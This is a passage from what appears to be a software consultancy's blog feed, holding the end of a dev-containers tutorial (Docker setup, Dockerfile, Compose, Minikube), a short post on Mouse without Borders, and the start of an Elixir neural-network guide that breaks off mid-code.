&lt;li&gt;Download Docker Desktop for Mac from &lt;a href=&quot;https://docs.docker.com/desktop/install/mac-install/&quot;&gt;Docker&#39;s official website.&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Open the Docker.dmg file you downloaded and drag the Docker app to your Applications folder.&lt;/li&gt;
&lt;li&gt;Open Docker Desktop from your Applications folder. You&#39;ll see a whale icon in your top status bar indicating that Docker is running.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3 id=&quot;installing-docker-on-linux&quot; tabindex=&quot;-1&quot;&gt;Installing Docker on Linux:&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;Update your existing list of packages:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;sudo apt-get update
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;Install a few prerequisite packages which let apt use packages over HTTPS:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;sudo apt-get install apt-transport-https ca-certificates curl software-properties-common
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start=&quot;3&quot;&gt;
&lt;li&gt;Add the GPG key for the official Docker repository to your system:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start=&quot;4&quot;&gt;
&lt;li&gt;Add the Docker repository to APT sources:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;sudo add-apt-repository &amp;quot;deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start=&quot;5&quot;&gt;
&lt;li&gt;Update the package database with the Docker packages from the newly added repo:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;sudo apt-get update
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start=&quot;6&quot;&gt;
&lt;li&gt;Make sure you are about to install from the Docker repo instead of the default Ubuntu repo:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;apt-cache policy docker-ce
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start=&quot;7&quot;&gt;
&lt;li&gt;Install Docker:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;sudo apt-get install docker-ce
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Remember, Docker commands usually require sudo privileges. To avoid typing sudo every time you run a Docker command, add your username to the Docker group:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;sudo usermod -aG docker ${USER}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You&#39;ll need to log out and log back in for this to take effect.&lt;/p&gt;
&lt;h3 id=&quot;creating-your-first-docker&quot; tabindex=&quot;-1&quot;&gt;Creating your first Docker&lt;/h3&gt;
&lt;p&gt;Once Docker is up and running, you can create a Dockerfile. This file is a text document that contains all the commands a user could call on the command line to assemble an image.&lt;/p&gt;
&lt;p&gt;Here&#39;s a simple Dockerfile example:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-Dockerfile&quot;&gt;# Use an official Python runtime as a parent image
FROM python:3.7-slim

# Set the working directory in the container to /app
WORKDIR /app

# Add the current directory contents into the container at /app
ADD . /app

# Install any needed packages specified in requirements.txt
RUN pip install --trusted-host pypi.python.org -r requirements.txt

# Make port 80 available to the world outside this container
EXPOSE 80

# Run app.py when the container launches
CMD [&amp;quot;python&amp;quot;, &amp;quot;app.py&amp;quot;]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In this example, we&#39;re setting up a simple Python application. We specify the parent image we&#39;re using (Python 3.7), set the working directory to /app, add our current directory into the container, install the necessary packages, expose the necessary port, and finally, specify what command to run when the container launches.&lt;/p&gt;
&lt;p&gt;Dockerfiles are incredibly flexible. You can create a Dockerfile for any application, regardless of the technology stack. This flexibility is one of the main benefits of using Dockerfiles to create your dev containers.&lt;/p&gt;
&lt;p&gt;When it comes to best practices for working with dev containers, here are a few tips:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Keep your Dockerfiles lean and efficient. Avoid installing unnecessary packages and clean up after yourself to keep the image size down.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Use .dockerignore files. These work like .gitignore files. They prevent unwanted files from being added to your Docker images.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Build your applications to be environment-agnostic as much as possible. This means minimizing the number of environment-specific configurations you need.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Use environment variables for configuration. This allows you to keep sensitive information out of your Dockerfiles.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Regularly update your images to get the latest security patches. You can automate this process with CI/CD pipelines.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Remember, the goal of using dev containers is to make your development workflow more consistent, isolated, and reproducible. Keep this in mind as you build and work with your dev containers.&lt;/p&gt;
&lt;p&gt;For more complex projects where you might want to combine several development environments like C, C++, Erlang, Elixir, JavaScript, and React in one environment this can become somewhat complex. This is where Happi Hacking can be of service. We help you set up efficenr custom made dev environments.&lt;/p&gt;
&lt;p&gt;As we&#39;ll soon see, this concept can be expanded to bring entire execution environments to the developer&#39;s machine using tools like Docker Compose or Minikube.&lt;/p&gt;
&lt;h2 id=&quot;pre-built-dev-containers-a-quick-start&quot; tabindex=&quot;-1&quot;&gt;Pre-built Dev Containers: A Quick Start&lt;/h2&gt;
&lt;p&gt;Pre-built dev containers are a great way to get started quickly. These are ready-made containers available on Docker Hub or other repositories that come with all the necessary tools and configurations already set up. You can simply pull these containers and start using them for development without having to worry about the setup process.&lt;/p&gt;
&lt;p&gt;For instance, if you&#39;re developing a Node.js application, you can pull a Node.js dev container that comes with Node.js, npm, and other necessary tools already installed. This can save you a lot of time and effort.&lt;/p&gt;
&lt;p&gt;Moreover, at Happi Hacking, we offer a custom Docker repository tailored to your organization&#39;s needs. We can provide pre-built dev containers equipped with the tools and configurations that your team uses regularly. This can further streamline your development workflow and ensure consistency across your team.&lt;/p&gt;
&lt;h3 id=&quot;visual-studio-code-dev-containers-seamless-setup-and-integration&quot; tabindex=&quot;-1&quot;&gt;Visual Studio Code Dev Containers: Seamless Setup and Integration&lt;/h3&gt;
&lt;p&gt;Visual Studio Code (VS Code) has a feature called Dev Containers that takes the convenience of pre-built dev containers to the next level. This feature allows you to define your development environment as code using a combination of a Dockerfile and a &lt;code&gt;.devcontainer.json&lt;/code&gt; configuration file.&lt;/p&gt;
&lt;p&gt;Once you&#39;ve defined your dev container, VS Code can automatically build and run the container, and then open your project inside the container environment. This means you can start coding immediately, with all your tools and dependencies already set up and ready to go.&lt;/p&gt;
&lt;p&gt;The real beauty of VS Code Dev Containers is the integration with the VS Code editor. You can use all VS Code features and extensions inside the dev container, just as if you were working locally. This includes IntelliSense code completion, debugging, version control, and more.&lt;/p&gt;
&lt;p&gt;Moreover, VS Code Dev Containers support both single-container and multi-container configurations with Docker Compose. However, it&#39;s important to note that you can only connect to one container per VS Code window. This means you can set up complex development environments involving multiple services, all running in separate but interconnected containers, but you would need to open a separate VS Code window for each container you want to connect to.&lt;/p&gt;
&lt;h4&gt;Customizing Your Environment with .devcontainer.json&lt;/h4&gt;
&lt;p&gt;A &lt;code&gt;devcontainer.json&lt;/code&gt; file is a configuration file that defines the development environment for Visual Studio Code when using Dev Containers. This file is typically located in the root of your project, inside a folder named &lt;code&gt;.devcontainer&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Here&#39;s a basic example of a &lt;code&gt;devcontainer.json&lt;/code&gt; file:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;{
    &amp;quot;name&amp;quot;: &amp;quot;A Happy Project&amp;quot;,
    &amp;quot;image&amp;quot;: &amp;quot;erlang-26.0.2.0&amp;quot;,
    &amp;quot;forwardPorts&amp;quot;: [8080],
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In this example:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;&amp;quot;name&amp;quot;&lt;/code&gt;: This is the name of your development environment. It&#39;s displayed in the lower left corner of VS Code when the dev container is active.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;&amp;quot;image&amp;quot;&lt;/code&gt;: This is the Docker image that the dev container will use. In this case, it&#39;s using a pre-built image for Erlang.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;&amp;quot;forwardPorts&amp;quot;&lt;/code&gt;: This is an array of ports that will be forwarded from the dev container to the host machine. In this case, port 8080 is being forwarded, which is common for web development servers.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These are just some basic options. The &lt;code&gt;devcontainer.json&lt;/code&gt; file can include many other options for more advanced scenarios, such as mounting volumes, setting environment variables, and even using Docker Compose to define multi-container environments.&lt;/p&gt;
&lt;h2 id=&quot;docker-compose-orchestrating-multi-container-environments&quot; tabindex=&quot;-1&quot;&gt;Docker Compose: Orchestrating Multi-Container Environments&lt;/h2&gt;
&lt;p&gt;Docker Compose is a tool that simplifies the process of managing multi-container Docker applications. It allows you to define and run applications consisting of multiple Docker containers using a single, easy-to-read YAML file. This file, typically named &lt;code&gt;docker-compose.yml&lt;/code&gt;, describes the services that make up your application so they can be run together in a single environment.&lt;/p&gt;
&lt;p&gt;Let&#39;s consider a simple example. Suppose you&#39;re developing a web application that uses a database. Instead of running the web server and database server separately, you can use Docker Compose to run both services together.&lt;/p&gt;
&lt;p&gt;Here&#39;s a basic &lt;code&gt;docker-compose.yml&lt;/code&gt; file for such a scenario:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-yaml&quot;&gt;version: &#39;3&#39;
services:
  web:
    build: .
    ports:
      - &amp;quot;5000:5000&amp;quot;
  db:
    image: postgres
    volumes:
      - ./data:/var/lib/postgresql/data
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In this file, we define two services: &lt;code&gt;web&lt;/code&gt; and &lt;code&gt;db&lt;/code&gt;. The &lt;code&gt;web&lt;/code&gt; service is built using the Dockerfile in the current directory and is mapped to port 5000. The &lt;code&gt;db&lt;/code&gt; service uses the &lt;code&gt;postgres&lt;/code&gt; image and mounts the &lt;code&gt;./data&lt;/code&gt; directory to a specific path within the container.&lt;/p&gt;
&lt;p&gt;To start the application, you would simply run &lt;code&gt;docker-compose up&lt;/code&gt; from the directory containing the &lt;code&gt;docker-compose.yml&lt;/code&gt; file. Docker Compose takes care of starting the services in the correct order, linking them together, and providing them with the necessary environment variables.&lt;/p&gt;
&lt;p&gt;Docker Compose is a powerful tool for managing complex applications with multiple services. It&#39;s especially useful in development environments, where you often need to run multiple services together. By using Docker Compose, you can ensure that your development environment closely matches your production environment, reducing the chances of encountering unexpected issues when you deploy your application.&lt;/p&gt;
&lt;h2 id=&quot;minikube-a-miniature-kubernetes-for-your-local-machine&quot; tabindex=&quot;-1&quot;&gt;Minikube: A Miniature Kubernetes for Your Local Machine&lt;/h2&gt;
&lt;p&gt;Minikube is a tool that lets you run Kubernetes, a powerful platform for managing containerized applications, on your local machine. It&#39;s designed to be easy to use and is perfect for when you&#39;re developing applications that will eventually be deployed on a full-fledged Kubernetes cluster.&lt;/p&gt;
&lt;p&gt;Let&#39;s revisit our web application and database example, but this time, we&#39;ll use Minikube and Kubernetes. The equivalent to a &lt;code&gt;docker-compose.yml&lt;/code&gt; file in Kubernetes is a set of configuration files that define Kubernetes resources such as Pods, Services, and Deployments.&lt;/p&gt;
&lt;p&gt;Here&#39;s a basic Kubernetes Deployment configuration for our web server:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-yaml&quot;&gt;apiVersion: apps/v1
kind: Deployment
metadata:
  name: web
spec:
  replicas: 1
  selector:
    matchLabels:
      app: web
  template:
    metadata:
      labels:
        app: web
    spec:
      containers:
      - name: web
        image: my-web-app:latest
        ports:
        - containerPort: 5000
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And here&#39;s a Service that makes the web server accessible on port 5000:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-yaml&quot;&gt;apiVersion: v1
kind: Service
metadata:
  name: web
spec:
  type: LoadBalancer
  ports:
  - port: 5000
    targetPort: 5000
  selector:
    app: web
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For the database, we could use a similar Deployment and Service configuration, but with the &lt;code&gt;postgres&lt;/code&gt; image and the appropriate ports and volumes.&lt;/p&gt;
&lt;p&gt;To apply these configurations and start the application, you would use &lt;code&gt;kubectl&lt;/code&gt;, the Kubernetes command-line tool, like so: &lt;code&gt;kubectl apply -f web-deployment.yaml&lt;/code&gt;, &lt;code&gt;kubectl apply -f web-service.yaml&lt;/code&gt;, and so on.&lt;/p&gt;
&lt;p&gt;Minikube brings the power of Kubernetes to your local machine, making it easier to develop complex, multi-container applications. It&#39;s a bit more involved than Docker Compose, but it offers greater flexibility and is a great way to get hands-on experience with Kubernetes.&lt;/p&gt;
&lt;h2 id=&quot;wrapping-up-the-power-of-dev-containers&quot; tabindex=&quot;-1&quot;&gt;Wrapping Up: The Power of Dev Containers&lt;/h2&gt;
&lt;p&gt;We&#39;ve covered a lot of ground in this article, but we&#39;ve only just scratched the surface of what dev containers can do. From providing consistent, reproducible development environments, to simplifying the onboarding process and facilitating collaboration, dev containers offer a host of benefits that can streamline your development workflow.&lt;/p&gt;
&lt;p&gt;To recap, here are some of the key advantages of using dev containers:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Consistency&lt;/strong&gt;: Dev containers ensure that every developer is working in the same environment, eliminating the &amp;quot;but it works on my machine&amp;quot; problem.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Simplicity&lt;/strong&gt;: With dev containers, setting up a new development environment is as easy as running a few commands. No need to install and configure a bunch of software manually.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Isolation&lt;/strong&gt;: Dev containers keep your projects isolated from one another, preventing conflicts between different projects&#39; dependencies.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Versatility&lt;/strong&gt;: Whether you&#39;re using Dockerfiles, Docker Compose, or pre-built images from Docker Hub, dev containers offer a variety of ways to set up your environment.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Integration&lt;/strong&gt;: Tools like Visual Studio Code&#39;s Dev Container feature make it easy to work with dev containers, integrating seamlessly with your existing workflow.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;If you haven&#39;t already, I encourage you to give dev containers a try in your own projects. You might be surprised at how much they can improve your development experience.&lt;/p&gt;
&lt;p&gt;And remember, if you need help setting up your dev container environments, Happi Hacking is here to assist. We offer dev container setup as a service, taking the hassle out of getting your environments up and running. Don&#39;t hesitate to reach out if you&#39;re interested.&lt;/p&gt;
&lt;p&gt;Sometimes confinement can be freedom. Embrace the power of dev containers and see what they can do for you? Happy coding!&lt;/p&gt;
&lt;p&gt;PS.&lt;/p&gt;
&lt;p&gt;Here are some resources for further reading on dev containers:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://code.visualstudio.com/docs/devcontainers/containers&quot;&gt;Developing inside a Container - Visual Studio Code&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://code.visualstudio.com/docs/devcontainers/tips-and-tricks&quot;&gt;Dev Containers Tips and Tricks - Visual Studio Code&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/manekinekko/awesome-devcontainers&quot;&gt;A curated list of awesome tools and resources about dev containers - GitHub&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/devcontainers&quot;&gt;devcontainers - GitHub&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://devspace.sh/docs/configuration/dev/modifications/resources&quot;&gt;Change Resource Constraints For Dev Containers | DevSpace | Documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/shows/beginners-series-to-dev-containers/&quot;&gt;Beginner&#39;s Series to: Dev Containers | Microsoft Learn&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://containers.dev/features&quot;&gt;Available Dev Container Features - Development containers&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://containers.dev/implementors/reference/&quot;&gt;Reference Implementation - Development containers&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://developer.ibm.com/technologies/containers/&quot;&gt;Containers - Resources and Tools - IBM Developer&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.docker.com/config/containers/resource_constraints/&quot;&gt;Runtime options with Memory, CPUs, and GPUs | Docker Documentation&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
</content>
  </entry>
  
  <entry>
    <title> Seamless Productivity with Mouse without Borders</title>
    <link href="https://happihacking.com/blog/posts/2023/mouse_without_borders/"/>
    <updated>2023-06-21T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/mouse_without_borders/</id>
    <summary>A Happi Hacker&#39;s Dream</summary>
    <content type="html">&lt;div style=&quot;width: 98%; text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/multimonitor.jpg&quot; alt=&quot;My multi monitor setup.&quot; style=&quot;width: 100%; object-fit: contain;&quot; title=&quot;My multi monitor setup.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;Greetings, fellow productivity enthusiasts! Today, I want to share a remarkable tool that has revolutionized the way I work from home. In a short video that I recorded, I&#39;ll walk you through the magic of Mouse without Borders, a feature-packed gem from Microsoft&#39;s PowerToys suite. Join me on this exciting journey as we explore how this nifty tool enhances my workflow and brings harmony to my dual-laptop setup.&lt;/p&gt;
&lt;p&gt;In the video, you&#39;ll witness the seamless synergy between my trusty Happy Hacking laptop and my dedicated client laptop, gracefully displayed on my wide Samsung monitor. With Picture-in-Picture mode, I relish the joy of having two screens at my fingertips-a visual treat that fuels my productivity.&lt;/p&gt;
&lt;p&gt;The Mouse without Borders enchantment takes center stage. As I move my mouse from my Happy Hacking laptop to my client laptop, the boundaries between the two dissolve. Thanks to this powerful tool, I effortlessly navigate between the realms of both machines. Whether I&#39;m editing code in Emacs running on the Linux subsystem for Windows or swiftly copying and pasting between laptops, the ease of movement is simply unparalleled.&lt;/p&gt;
&lt;p&gt;In this new era of hybrid work, where collaboration with both my company and my esteemed client is the norm, Mouse without Borders becomes my trusted companion. With the synchronization it brings, my two laptops merge into a harmonious workspace. A single mouse is all I need to traverse between my Happy Hacking laptop and my client laptop.&lt;/p&gt;
&lt;p&gt;See for yourself in this video:&lt;/p&gt;
&lt;iframe width=&quot;244&quot; height=&quot;430&quot; src=&quot;https://www.youtube.com/embed/Q5r061ftptI?autoplay=1&amp;mute=1&quot; &lt;=&quot;&quot; iframe=&quot;&quot;&gt;
&lt;/iframe&gt;</content>
  </entry>
  
  <entry>
    <title>Neural Networks in Elixir</title>
    <link href="https://happihacking.com/blog/posts/2023/neural_networks_elixir/"/>
    <updated>2023-06-19T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/neural_networks_elixir/</id>
    <summary>A beginners guide</summary>
    <content type="html">&lt;div style=&quot;text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/web.jpg&quot; alt=&quot;A spider web.&quot; title=&quot;A spider web.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;Today was an exciting day as I embarked on a journey to explore the world of neural networks using Elixir. My goal is to leverage the power of the BEAM virtual machine and the functional programming paradigm to build a neural network model and
for fun implement the layers in the network as a network
of communicating processes.&lt;/p&gt;
&lt;p&gt;Neural networks are a subset of machine learning algorithms modeled after the human brain. They are designed to recognize patterns and interpret sensory data through a kind of machine perception, labeling or clustering raw input. These algorithms can be used to recognize complex patterns, make predictions, or make decisions in a diverse range of applications including image and speech recognition, medical diagnosis, statistical arbitrage, learning to rank, and even in games. The networks themselves are composed of interconnected nodes or &#39;neurons&#39;, which are organized into layers. Each layer processes the input it receives and passes on a transformed version of the input to the next layer. This structure allows neural networks to learn from data and improve over time, making them a powerful tool in the field of artificial intelligence.&lt;/p&gt;
&lt;p&gt;As it turns out the great developers in the Elixir community
has already done almost all the work. I have been meaning to
try this out for a long time but have not had the time to do it.
But today I had a Sunday afternoon free and could choose between
playing Diablo IV or doing som coding for fun.&lt;/p&gt;
&lt;p&gt;I hope to revisit this topic in a future blog post, where I plan to enhance Axon&#39;s functionality by using processes and process communication instead of Elixir streams for the loops I don&#39;t expect it to be more efficient but I think it would be a fun and cool project to do.&lt;/p&gt;
&lt;p&gt;Todays blog will be more of a beginners guide on how to do a basic set up and how to test that it works.&lt;/p&gt;
&lt;p&gt;I am assuming lots of things, for example that you are running Ubuntu linux and have some development experience. This is more a guide for me, than for you as a reader, sorry ;).&lt;/p&gt;
&lt;h2 id=&quot;setting-up-the-environment&quot; tabindex=&quot;-1&quot;&gt;Setting Up the Environment&lt;/h2&gt;
&lt;p&gt;The first step was to set up the development environment. I used &lt;a href=&quot;https://asdf-vm.com/&quot;&gt;asdf&lt;/a&gt;, a version manager that can manage multiple language runtime versions on a per-project basis.&lt;/p&gt;
&lt;p&gt;Note that these steps are specific to Ubuntu and that I am running Ubuntu in WSL2 under Windows 11, your mileage may vary.&lt;/p&gt;
&lt;p&gt;I cloned the asdf repository and added it to my shell profile:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;git clone https://github.com/asdf-vm/asdf.git ~/.asdf --branch v0.12.0
echo -e &#39;&#92;n. &amp;quot;$HOME/.asdf/asdf.sh&amp;quot;&#39; &amp;gt;&amp;gt; ~/.bashrc
echo -e &#39;&#92;n. &amp;quot;$HOME/.asdf/completions/asdf.bash&amp;quot;&#39; &amp;gt;&amp;gt; ~/.bashrc
. ~/.bashrc
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Next, I added Erlang and Elixir plugins to asdf and installed the versions I needed:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;asdf plugin add erlang
asdf plugin add elixir
asdf install erlang 26.0.1
asdf install elixir main-otp-26
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id=&quot;creating-a-new-elixir-project&quot; tabindex=&quot;-1&quot;&gt;Creating a New Elixir Project&lt;/h2&gt;
&lt;p&gt;With the environment set up, I created a new Elixir project using the &lt;code&gt;mix new&lt;/code&gt; command:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;mix new test_nx
cd test_nx
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id=&quot;adding-dependencies&quot; tabindex=&quot;-1&quot;&gt;Adding Dependencies&lt;/h2&gt;
&lt;p&gt;I added the necessary dependencies to the &lt;code&gt;mix.exs&lt;/code&gt; file. I used &lt;a href=&quot;https://github.com/elixir-nx/nx/tree/main/nx&quot;&gt;Nx&lt;/a&gt;, a multi-dimensional tensors library for Elixir, and &lt;a href=&quot;https://github.com/elixir-nx/nx/tree/main/torchx&quot;&gt;Torchx&lt;/a&gt;, a library that provides bindings for the LibTorch tensor library.&lt;/p&gt;
&lt;p&gt;Nx is the Elixir tensor computation library that allows you to perform numerical computations, which are essential for building neural networks.&lt;/p&gt;
&lt;p&gt;A tensor is a mathematical object that generalizes the concepts of scalars, vectors, and matrices to higher dimensions. It&#39;s essentially an array of numbers, arranged on a grid, with a variable number of axes. Tensors provide a natural and compact way of representing data and transformations of data in machine learning, physics, and many other fields. In the context of machine learning, tensors are particularly important because they efficiently represent and manipulate multi-dimensional data structures, such as images, which can be represented as 3D tensors (height, width, color channels), or text, which can be represented as 2D tensors (sequence length, word embeddings). The ability to work with tensors allows us to handle a wide range of complex data types, making them a fundamental building block in these fields.&lt;/p&gt;
&lt;p&gt;Torchx is an Elixir binding to the popular Torch machine learning library which I in the future will use to bring in some of my old
models from PyTorch to run on the BEAM instead.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-elixir&quot;&gt;defp deps do
  [
    {:nx, &amp;quot;~&amp;gt; 0.5&amp;quot;},
    {:torchx, &amp;quot;~&amp;gt; 0.5&amp;quot;}
  ]
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then, I fetched the dependencies:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;mix deps.get
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id=&quot;exploring-nx&quot; tabindex=&quot;-1&quot;&gt;Exploring Nx&lt;/h2&gt;
&lt;p&gt;I started an IEx session with my Mix dependencies:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;iex -S mix
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I experimented with Nx by creating a tensor and performing some operations on it copied directly from the &lt;a href=&quot;https://github.com/elixir-nx/nx/tree/main/nx&quot;&gt;Nx documentation&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-elixir&quot;&gt;iex&amp;gt; t = Nx.tensor([[1, 2], [3, 4]])
iex&amp;gt; Nx.divide(Nx.exp(t), Nx.sum(Nx.exp(t)))
#Nx.Tensor&amp;lt;
  f32[2][2]
  [
    [0.032058604061603546, 0.08714432269334793],
    [0.23688282072544098, 0.6439142227172852]
  ]
&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It worked!&lt;/p&gt;
&lt;h2 id=&quot;building-a-neural-network-with-axon&quot; tabindex=&quot;-1&quot;&gt;Building a Neural Network with Axon&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/elixir-nx/axon&quot;&gt;Axon&lt;/a&gt; is a deep learning library for the Elixir programming language. It provides a high-level, flexible API for defining neural network models in Elixir. Axon leverages the Nx library for tensor computations, which allows for efficient numerical computation that is essential in machine learning. The reason for using Axon in this context is its seamless integration with Elixir and the BEAM virtual machine, providing a functional approach to defining and training neural networks. It also supports automatic differentiation and GPU acceleration, which are crucial for training complex models efficiently.&lt;/p&gt;
&lt;p&gt;I added Axon and Exla (and stb_image for a later step, and another blog) to my dependencies:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-elixir&quot;&gt; defp deps do
    [
      # {:dep_from_hexpm, &amp;quot;~&amp;gt; 0.3.0&amp;quot;},
      # {:dep_from_git, git: &amp;quot;https://github.com/elixir-lang/my_dep.git&amp;quot;, tag: &amp;quot;0.1.0&amp;quot;}
      {:nx, &amp;quot;~&amp;gt; 0.5&amp;quot;},
      {:torchx, &amp;quot;~&amp;gt; 0.5&amp;quot;},
      {:axon, &amp;quot;~&amp;gt; 0.5&amp;quot;},
      {:exla, &amp;quot;~&amp;gt; 0.5&amp;quot;},
      {:stb_image, &amp;quot;~&amp;gt; 0.5.2&amp;quot;}
    ]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Downloaded the dependencies and started Elixir:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;mix deps.get
iex -S mix
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;To test this I used an example from the &lt;a href=&quot;https://github.com/elixir-nx/axon/blob/main/examples/basics/multi_input_example.exs&quot;&gt;Axon examples&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This model is a simple XOR function that takes two binary inputs and outputs a single binary value. The model is trained using a batch of random binary inputs and their corresponding XOR results.&lt;/p&gt;
&lt;p&gt;The XOR function, a fundamental operation in computing and digital logic, stands for &amp;quot;exclusive or&amp;quot;, and it&#39;s a binary operation that takes two inputs. If exactly one of the inputs is true (or 1 in binary terms), it returns true (or 1). In all other cases (both inputs are false or both are true), it returns false (or 0).&lt;/p&gt;
&lt;p&gt;In the context of this guide, the XOR function is used as a simple problem for the neural network to learn. It&#39;s a non-linear problem, meaning it can&#39;t be solved using simple linear methods, which makes it a good test for a neural network. The goal is to train the network to understand the XOR logic, i.e., given two binary inputs, it should output the correct XOR result. This serves as a basic proof of concept that the neural network is functioning correctly and can learn to approximate functions.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-elixir&quot;&gt;defmodule XOR do

require Axon

  defp build_model(input_shape1, input_shape2) do
    inp1 = Axon.input(&amp;quot;x1&amp;quot;, shape: input_shape1)
    inp2 = Axon.input(&amp;quot;x2&amp;quot;, shape: input_shape2)

    inp1
    |&amp;gt; Axon.concatenate(inp2)
    |&amp;gt; Axon.dense(8, activation: :tanh)
    |&amp;gt; Axon.dense(1, activation: :sigmoid)
  end

  defp batch do
    x1 = Nx.tensor(for _ &amp;lt;- 1..32, do: [Enum.random(0..1)])
    x2 = Nx.tensor(for _ &amp;lt;- 1..32, do: [Enum.random(0..1)])
    y = Nx.logical_xor(x1, x2)
    { %{&amp;quot;x1&amp;quot; =&amp;gt; x1, &amp;quot;x2&amp;quot; =&amp;gt; x2}, y }
  end

  defp train_model(model, data, epochs) do
    model
    |&amp;gt; Axon.Loop.trainer(:binary_cross_entropy, :sgd)
    |&amp;gt; Axon.Loop.run(data, %{}, epochs: epochs, iterations: 1000, compiler: EXLA)
  end

  def run do
